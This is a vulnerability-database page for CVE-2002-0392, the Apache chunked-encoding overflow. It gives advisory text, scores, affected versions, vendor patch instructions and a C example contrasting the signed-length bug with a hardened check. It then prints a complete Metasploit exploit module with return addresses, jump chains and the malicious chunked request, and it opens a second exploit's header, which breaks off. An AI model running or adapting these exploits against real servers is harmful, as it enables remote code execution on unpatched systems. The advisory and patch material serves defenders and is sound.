CVE-2002-0392
CVSS 7.5
Published: 2002-07-03 00:00:00
Last revised: 2011-03-07 21:08:10

[Original] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.


[CNNVD] Apache Web Server chunked-encoding remote overflow vulnerability (CNNVD-200207-041)

        
        Apache Web Server is a widely deployed, open-source web server developed and maintained by the Apache Software Foundation. It runs on many operating systems, including Unix/Linux/BSD systems and Windows.
        Apache has a design flaw in its handling of HTTP requests whose body is transferred with chunked encoding. A remote attacker may be able to use it to execute arbitrary instructions with the privileges of the web server process on some Apache servers, or to cause a denial of service.
        Chunked transfer encoding is a method defined in HTTP/1.1 for a client to submit data to a server when the total size is not known in advance: the client sends the body as a sequence of chunks, each prefixed with its own length, and the server sets aside a buffer to hold the data as it arrives.
        Apache supports chunked encoding by default. It stores the chunk length in a signed variable and reads chunk data into a fixed-size stack buffer. As a safety check, before copying chunk data into that buffer Apache compares the chunk length against the buffer length: if the chunk length is larger, it copies at most one buffer's worth of data, otherwise it copies the chunk length. The comparison is made without converting the chunk length to an unsigned type, so an attacker who supplies a chunk length with the sign bit set (at least 0x80000000 bytes, which the signed comparison treats as negative) bypasses the check. The negative length reaches the copy routine, where it is interpreted as a very large unsigned size, and the copy overruns the buffer.
        For Apache 1.3 through 1.3.24 (inclusive), remote code execution has been confirmed on Win32. On UNIX, code execution has been confirmed at least on OpenBSD, and successful exploitation has been reported on the following systems as well:
         * Sun Solaris 6-8 (sparc/x86)
         * FreeBSD 4.3-4.5 (x86)
         * OpenBSD 2.6-3.1 (x86)
         * Linux (GNU) 2.4 (x86)
        Apache 2.0 through 2.0.36 (inclusive) contains the same problematic code, but it detects the error condition and terminates the child process.
        Depending on various factors, including the threading model used on the affected system, this vulnerability can cause a denial of service against Apache on any of the affected operating systems.
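The signed-length check described above, shown as an added worked example. This is not Apache source code and not part of the CNNVD entry: it models the pattern the advisory describes (a chunk length kept in a signed 32-bit `long`, compared with a signed `int` buffer size, then handed to a copy routine that takes an unsigned size) next to a hardened version that parses the length as unsigned and rejects values that do not fit. The function names, the 8192-byte buffer size and the sample request are this example's own assumptions; the chunk-size line `FFFFFFF0` is the value the Metasploit module further down this page sends.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example (not Apache source). Apache 1.3 kept the chunk length in a
 * signed `long`, which is 32 bits on the platforms listed above; the width is
 * pinned to int32_t here so the behaviour is the same on a 64-bit host.
 * EXAMPLE_BUFSIZ is an assumed stand-in for the fixed-size stack buffer.
 */
#define EXAMPLE_BUFSIZ 8192

/* Constructed request in the shape the exploits on this page send: a chunked
 * body whose first chunk-size line has the sign bit set. */
static const char constructed_request[] =
    "GET / HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "FFFFFFF0 \r\n"
    "AAAAAAAA";

/* Return the start of the body (the first chunk-size line), or NULL. */
const char *chunked_body_start(const char *request)
{
    const char *p = strstr(request, "\r\n\r\n");
    return p ? p + 4 : NULL;
}

static int hexval(unsigned char c)
{
    return isdigit(c) ? c - '0' : tolower(c) - 'a' + 10;
}

/* Accumulate the hex digits into a 32-bit signed length, the width the
 * vulnerable code effectively used; anything >= 0x80000000 comes out negative. */
int32_t parse_chunk_size_signed32(const char *line)
{
    uint32_t v = 0;
    for (; isxdigit((unsigned char)*line); line++)
        v = (v << 4) | (uint32_t)hexval((unsigned char)*line);
    return (int32_t)v;           /* "FFFFFFF0" -> -16 */
}

/* Vulnerable bound check: a negative length is "less than" bufsiz, so it is
 * passed through unchanged instead of being capped. */
long vulnerable_len_to_read(int32_t remaining, int bufsiz)
{
    return (remaining > bufsiz) ? bufsiz : remaining;
}

/* What the copy routine sees: the same bits reinterpreted as a 32-bit size. */
size_t as_copy_size(long len_to_read)
{
    return (size_t)(uint32_t)len_to_read;
}

/* 1 if the length the vulnerable path selects would run past the buffer.
 * Only computes the size; nothing is copied, so this is safe to run. */
int vulnerable_overflows(const char *request, int bufsiz)
{
    const char *line = chunked_body_start(request);
    if (!line)
        return 0;
    long n = vulnerable_len_to_read(parse_chunk_size_signed32(line), bufsiz);
    return as_copy_size(n) > (size_t)bufsiz;
}

/* Hardened version: parse as unsigned, refuse a chunk size that would not fit
 * in a non-negative 32-bit value (returns -1), otherwise cap at one buffer. */
long hardened_len_to_read(const char *line, int bufsiz)
{
    uint64_t v = 0;
    for (; isxdigit((unsigned char)*line); line++) {
        if (v > (UINT64_C(0x7fffffff) >> 4))   /* next digit would exceed INT32_MAX */
            return -1;
        v = (v << 4) | (uint64_t)hexval((unsigned char)*line);
    }
    return (v > (uint64_t)bufsiz) ? bufsiz : (long)v;
}

int main(void)
{
    const char *line = chunked_body_start(constructed_request);
    int32_t remaining = parse_chunk_size_signed32(line);
    long n = vulnerable_len_to_read(remaining, EXAMPLE_BUFSIZ);
    printf("chunk-size line \"%.8s\": signed %ld, len_to_read %ld, copy size %zu, buffer %d\n",
           line, (long)remaining, n, as_copy_size(n), EXAMPLE_BUFSIZ);
    printf("hardened len_to_read: %ld (-1 = rejected)\n",
           hardened_len_to_read(line, EXAMPLE_BUFSIZ));
    return 0;
}
```

The width matters: with a 64-bit `long`, the same eight hex digits parse to a positive 4294967280 and the signed comparison caps it correctly, which is why the 32-bit platforms in the list above were the ones exploited; an attacker facing a 64-bit signed length would need sixteen digits to reach the sign bit. The hardened parser's overflow test is also the check a reverse proxy or IDS can apply to a chunk-size line: any value that does not fit in a non-negative 32-bit integer is a request no legitimate client sends.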
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:apache:http_server:1.3.17::win32
cpe:/a:apache:http_server:1.3.19  Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.11  Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3  Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:2.0.36  Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:1.3.14::win32
cpe:/a:apache:http_server:1.3.18::win32
cpe:/a:apache:http_server:2.0.35  Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:1.3.24  Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:http_server:1.1.1  Apache Software Foundation Apache HTTP Server 1.1.1
cpe:/a:apache:http_server:1.3.13::win32
cpe:/a:apache:http_server:1.3.20::win32
cpe:/a:apache:http_server:1.2.5  Apache Software Foundation Apache HTTP Server 1.2.5
cpe:/a:apache:http_server:1.0  Apache Software Foundation Apache HTTP Server 1.0
cpe:/a:apache:http_server:1.3.12  Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:apache:http_server:2.0  Apache Software Foundation Apache HTTP Server 2.0
cpe:/a:apache:http_server:1.3.15::win32
cpe:/a:apache:http_server:1.2  Apache Software Foundation Apache 1.2
cpe:/a:apache:http_server:1.3.14  Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:apache:http_server:2.0.28  Apache Software Foundation Apache HTTP Server 2.0.28
cpe:/a:apache:http_server:1.3.9  Apache Software Foundation Apache HTTP Server 1.3.9
cpe:/a:apache:http_server:1.3.22::win32
cpe:/a:apache:http_server:1.3.1  Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/a:apache:http_server:1.3.16::win32
cpe:/a:apache:http_server:1.3.4  Apache Software Foundation Apache HTTP Server 1.3.4
cpe:/a:apache:http_server:1.3.17  Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.18  Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.22  Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.19::win32
cpe:/a:apache:http_server:1.0.3  Apache Software Foundation Apache HTTP Server 1.0.3
cpe:/a:apache:http_server:1.3.20  Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.14::mac_os
cpe:/a:apache:http_server:1.3.3  Apache Software Foundation Apache HTTP Server 1.3.3
cpe:/a:apache:http_server:1.3.24::win32
cpe:/a:apache:http_server:1.3.11::win32
cpe:/a:apache:http_server:2.0.32  Apache Software Foundation Apache HTTP Server 2.0.32
cpe:/a:apache:http_server:1.3.12::win32
cpe:/a:apache:http_server:1.0.5  Apache Software Foundation Apache HTTP Server 1.0.5
cpe:/a:apache:http_server:1.1  Apache Software Foundation Apache HTTP Server 1.1
cpe:/a:apache:http_server:1.0.2  Apache Software Foundation Apache HTTP Server 1.0.2
cpe:/a:apache:http_server:1.3.23::win32
cpe:/a:apache:http_server:1.3.23  Apache Software Foundation Apache HTTP Server 1.3.23

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0392
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0392
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-041
(official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2002-17.html
(VENDOR_ADVISORY)  CERT  CA-2002-17
http://www.kb.cert.org/vuls/id/944335
(UNKNOWN)  CERT-VN  VU#944335
http://www2.itrc.hp.com/service/cki/docDisplay.do?docLocale=en_US&docId=200000083816475
(UNKNOWN)  HP  SSRT050968
http://httpd.apache.org/info/security_bulletin_20020617.txt
(VENDOR_ADVISORY)  CONFIRM  http://httpd.apache.org/info/security_bulletin_20020617.txt
http://www.securityfocus.com/bid/5033
(UNKNOWN)  BID  5033
http://www.securityfocus.com/bid/20005
(UNKNOWN)  BID  20005
http://www.redhat.com/support/errata/RHSA-2003-106.html
(UNKNOWN)  REDHAT  RHSA-2003:106
http://www.redhat.com/support/errata/RHSA-2002-150.html
(UNKNOWN)  REDHAT  RHSA-2002:150
http://www.redhat.com/support/errata/RHSA-2002-126.html
(UNKNOWN)  REDHAT  RHSA-2002:126
http://www.osvdb.org/838
(UNKNOWN)  OSVDB  838
http://www.novell.com/linux/security/advisories/2002_22_apache.html
(UNKNOWN)  SUSE  SuSE-SA:2002:022
http://www.linuxsecurity.com/advisories/other_advisory-2137.html
(UNKNOWN)  ENGARDE  ESA-20020619-014
http://www.iss.net/security_center/static/9249.php
(UNKNOWN)  XF  apache-chunked-encoding-bo(9249)
http://www.frsirt.com/english/advisories/2006/3598
(UNKNOWN)  FRSIRT  ADV-2006-3598
http://www.debian.org/security/2002/dsa-133
(UNKNOWN)  DEBIAN  DSA-133
http://www.debian.org/security/2002/dsa-132
(UNKNOWN)  DEBIAN  DSA-132
http://www.debian.org/security/2002/dsa-131
(UNKNOWN)  DEBIAN  DSA-131
http://secunia.com/advisories/21917
(UNKNOWN)  SECUNIA  21917
http://rhn.redhat.com/errata/RHSA-2002-118.html
(UNKNOWN)  REDHAT  RHSA-2002:118
http://rhn.redhat.com/errata/RHSA-2002-117.html
(UNKNOWN)  REDHAT  RHSA-2002:117
http://rhn.redhat.com/errata/RHSA-2002-103.html
(UNKNOWN)  REDHAT  RHSA-2002:103
http://online.securityfocus.com/archive/1/278149
(UNKNOWN)  BUGTRAQ  20020621 [SECURITY] Remote exploit for 32-bit Apache HTTP Server known
http://online.securityfocus.com/advisories/4257
(UNKNOWN)  HP  HPSBUX0207-197
http://online.securityfocus.com/advisories/4240
(UNKNOWN)  HP  HPSBTL0206-049
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2002:039
(UNKNOWN)  MANDRAKE  MDKSA-2002:039
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000498
(UNKNOWN)  CONECTIVA  CLSA-2002:498
http://archives.neohapsis.com/archives/bugtraq/2002-06/0266.html
(UNKNOWN)  BUGTRAQ  20020621 [slackware-security] new apache/mod_ssl packages available
http://archives.neohapsis.com/archives/bugtraq/2002-06/0235.html
(UNKNOWN)  BUGTRAQ  20020619 [OpenPKG-SA-2002.004] OpenPKG Security Advisory (apache)
ftp://patches.sgi.com/support/free/security/advisories/20020605-01-I
(UNKNOWN)  SGI  20020605-01-I
ftp://patches.sgi.com/support/free/security/advisories/20020605-01-A
(UNKNOWN)  SGI  20020605-01-A
ftp://ftp.caldera.com/pub/updates/OpenUNIX/CSSA-2002-SCO.31
(UNKNOWN)  CALDERA  CSSA-2002-SCO.31
ftp://ftp.caldera.com/pub/updates/OpenServer/CSSA-2002-SCO.32
(UNKNOWN)  CALDERA  CSSA-2002-SCO.32
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-029.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-029.0

- Vulnerability information

Apache Web Server chunked-encoding remote overflow vulnerability
High severity  Unknown
2002-07-03 00:00:00 2006-04-07 00:00:00
Remote
        

- Advisories and patches

        Workaround:
        There is no good workaround for this vulnerability. Since a working exploit has already been published, we recommend upgrading to the latest Apache version immediately.
        Vendor patches:
        Apache Group
        ------------
        The Apache Group has published a security bulletin (SB-20020617) and corresponding upgrades:
        SB-20020617: Apache httpd: vulnerability with chunked encoding
        Link:
        http://httpd.apache.org/info/security_bulletin_20020617.txt

        The latest versions can be downloaded from:
        Apache 1.3.26:
        Apache 2.0.39:
        
        http://www.apache.org/dist/httpd/

        Debian
        ------
        Debian has published a security advisory (DSA-131-1) and corresponding patches:
        DSA-131-1: Apache chunk handling vulnerability
        Link:
        http://www.debian.org/security/2002/dsa-131

        Patch downloads:
        Source archives:
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9-14.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9-14.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9.orig.tar.gz
        Architecture independent archives:
        http://security.debian.org/dists/stable/updates/main/binary-all/apache-doc_1.3.9-14.1_all.deb
        Alpha architecture:
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache-common_1.3.9-14.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache-dev_1.3.9-14.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache_1.3.9-14.1_alpha.deb
        ARM architecture:
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache-common_1.3.9-14.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache-dev_1.3.9-14.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache_1.3.9-14.1_arm.deb
        Intel IA-32 architecture:
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache-common_1.3.9-14.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache-dev_1.3.9-14.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache_1.3.9-14.1_i386.deb
        Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache-common_1.3.9-14.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache-dev_1.3.9-14.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache_1.3.9-14.1_m68k.deb
        PowerPC architecture:
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/apache-common_1.3.9-14.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/apache-dev_1.3.9-14.1_powerpc.deb
        http://security.debian.org/dists/stable/up

        Patch installation:
        1. Install the patch package manually:
         First, download the patch with:
         # wget url (url is the patch download link)
         Then install it with:
         # dpkg -i file.deb (file is the name of the patch package)
        2. Install the patch package automatically with apt-get:
         First, refresh the package database:
         # apt-get update
        
         Then install the updated packages:
         # apt-get upgrade
        FreeBSD
        -------
        FreeBSD has published a security notice (FreeBSD-SN-02:04) and corresponding patches:
        FreeBSD-SN-02:04: security issues in ports
        Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:04.asc
        To upgrade to a fixed port, use either of the following methods:
        1) Update your Ports Collection, then rebuild and reinstall the port. The following tools make this easier:
         /usr/ports/devel/portcheckout
         /usr/ports/misc/porteasy
         /usr/ports/sysutils/portupgrade
        2) Deinstall the old package, then fetch and install a new package from:
        [i386]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/
        OpenBSD
        -------
        The vendor has released a patch for this issue; download it from the vendor's site:
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/005_httpd.patch
        For more information see:
        
        http://www.openbsd.org/errata.html#httpd

        RedHat
        ------
        Red Hat has published a security advisory (RHSA-2002:103-13) and corresponding patches:
        RHSA-2002:103-13: Updated Apache packages fix chunked encoding issue
        Link: https://www.redhat.com/support/errata/RHSA-2002-103.html
        Patch downloads:
        Red Hat Linux 6.2:
        SRPMS:
        ftp://updates.redhat.com/6.2/en/os/SRPMS/apache-1.3.22-5.6.src.rpm
        alpha:
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-1.3.22-5.6.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-devel-1.3.22-5.6.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-manual-1.3.22-5.6.alpha.rpm
        i386:
        ftp://updates.redhat.com/6.2/en/os/i386/apache-1.3.22-5.6.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/apache-devel-1.3.22-5.6.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/apache-manual-1.3.22-5.6.i386.rpm
        sparc:
        ftp://updates.redhat.com/6.2/en/os/sparc/apache-1.3.22-5.6.sparc.rpm
        

- Vulnerability information (16782)

Apache Win32 Chunked Encoding (EDBID:16782)
windows remote
2010-07-07 Verified
0 metasploit
N/A
##
# $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	HttpFingerprint = { :pattern => [ /Apache/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apache Win32 Chunked Encoding',
			'Description'    => %q{
					This module exploits the chunked transfer integer wrap
				vulnerability in Apache version 1.2.x to 1.3.24. This
				particular module has been tested with all versions of the
				official Win32 build between 1.3.9 and 1.3.24. Additionally,
				it should work against most co-branded and bundled versions
				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

				You will need to use the Check() functionality to determine
				the exact target version prior to launching the exploit. The
				version of Apache bundled with Oracle 8.1.7 will not
				automatically restart, so if you use the wrong target value,
				the server will crash.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'Version'        => '$Revision: 9719 $',
			'References'     =>
				[
					[ 'CVE', '2002-0392' ],
					[ 'OSVDB', '838'],
					[ 'BID', '5033' ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],

				],
			'Privileged'     => true,
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 987,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'MinNops'  => 200,
					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

				},
			'Targets'        =>
				[
					[  'Windows Generic Bruteforce', {} ],

					# Official Apache.org win32 builds
					[  'Apache.org Build 1.3.9->1.3.19',
						{
							'Ret' => 0x00401151,
							'Pad' => [6,2,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22->1.3.24',
						{
							'Ret' => 0x00401141,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.19->1.3.24',
						{
							'Ret' => 0x6ff6548d,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22',
						{
							'Ret' => 0x6ff762ac,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call ebx
					[  'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
						{
							'Ret' => 0x1c0f13e5,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call esi
					[  'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
						{
							'Ret' => 0x1c0f1033,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Interesting return to PEB trick for Windows 2003 systems...
					[  'Windows 2003 English SP0',
						{
							'Ret' => 0x7ffc0638,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Pop/Pop/Return on Windows 2000
					[  'Windows 2000 English',
						{
							'Ret' => 0x75022ac4,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Oracle HTTPD: [ 8.1.7 ] (one shot)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 8.1.7 Apache 1.3.12',
						{
							'Ret' => 0x1d84d42c,
							'Pad' => [7]
						}
					],

					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 9.1.0 Apache 1.3.12',
						{
							'Ret' => 0x10016061,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
					[  'Oracle 9.2.0 Apache 1.3.22',
						{
							'Ret' => 0x6ff6427a,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Generic debugging targets
					[  'Debugging Target',
						{
							'Ret' => 0xcafebabe,
							'Pad' => [0,1,2,3,4,5,6,7]
						}
					]
				],
			'DisclosureDate' => 'Jun 19 2002',
			'DefaultTarget'  => 0))
	end

	def check
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe
		end

		http_fingerprint({ :response => response })  # Custom Server header matching

		code = Exploit::CheckCode::Appears

		case response['Server']
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
				print_status("IBM backported the patch, this system is not vulnerable")
				code = Exploit::CheckCode::Safe
			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
			else
				code = Exploit::CheckCode::Safe
		end

		if code == Exploit::CheckCode::Appears
			print_status("Vulnerable server: #{response['Server']}")
		else
			print_status("Server is probably not vulnerable: #{response['Server']}")
		end

		return code
	end

	def auto_target
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_error("No response to request")
			return []  # targets_to_try is not assigned yet at this point; returning it here raised NameError
		end

		http_fingerprint({ :response => response })  # Custom Server header matching / automatic target selection

		targets_to_try = []
		server_hdr = response['Server']
		print_status("Server: #{server_hdr}")

		case server_hdr
		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
			targets_to_try.push(targets[9])

		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
			targets_to_try.push(targets[10])

		when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
			targets_to_try.push(targets[11])

		when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
			# fall through

		else
			# check for apache version ranges
			if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
				version = $1

				#print_status("Apache version: #{version}")
				ver = version.split('.')
				if (ver.length == 3)
					major = ver[0].to_i
					minor = ver[1].to_i
					rev = ver[2].to_i
					if (major == 1 and minor == 3)
						targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
						targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
						targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
						targets_to_try.push(targets[4]) if (rev == 22)

						# Add the remaining targets, regardless of quality...
						if (server_hdr =~ /Win32/)
							# targets 5, 6, 7, 8
							if (rev >= 17 and rev <= 24)
								targets_to_try.push(targets[5])
								targets_to_try.push(targets[6])
							end
							targets_to_try.push(targets[7])
							targets_to_try.push(targets[8])
						end
					end
					# Version 1.0 - 1.2, Fall through...
				end
				# ServerTokens setting isn't giving up enough information ...  Might need to try?
			end
			# Not Apache?  Fall through...
		end

		targets_to_try
	end

	#
	# If auto, ask the auto_target function for a list of
	# targets to try...
	#
	# If not auto, just try the selected target.
	#
	def exploit
		if target_index == 0
			targs = auto_target
			print_status("Auto-targeting returned #{targs.length} candidates...")
			targs.each_with_index { |targ, idx|
				# Never try the debug target automatically :)
				next if targ.name =~ /Debug/
				exploit_target(targ)
			}
		else
			exploit_target(target)
		end
	end

	def exploit_target(target)
		target['Pad'].each { |pad|
			pattern =
				rand_text_alphanumeric(3936) +
				payload.encoded +
				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
				rand_text_alphanumeric(pad)

			# Move slightly further back to allow padding changes
			pattern +=
				"\xeb\xf0\xde\xad" +
				[target.ret].pack('V')

			# Create a chain of return addresses and reverse jumps
			254.times { |x|
				pattern +=
					"\xeb\xf6\xbe\xef" +
					[target.ret].pack('V')
			}

			# Even out the request length based on the padding value
			# This is required to reliably hit the return address offset
			pattern += rand_text_alphanumeric(8 - pad)

			#
			# Regardless of what return we hit, execution jumps backwards to the shellcode:
			#                                   _______________ _______________ ___________
			#       _________    _____________  | ________    | | ______      | | ______
			#       v       |    v           |  v v      |    | v v    |      | v v    |
			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
			#

			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

			# Build the request
			send_request_raw({
				'uri'     => '/',
				'headers' =>
					{
						'Transfer-Encoding' => "CHUNKED"
					},
				'data'    => "FFFFFFF0 " + pattern,
			}, 2)

			# Check the handler
			handler
		}
	end

end
		

- Vulnerability information (21559)

Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1) (EDBID:21559)
multiple remote
2002-06-17 Verified
0 Gobbles Security
N/A
source: http://www.securityfocus.com/bid/5033/info

When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.

**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.


/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
 * 
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 * 
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
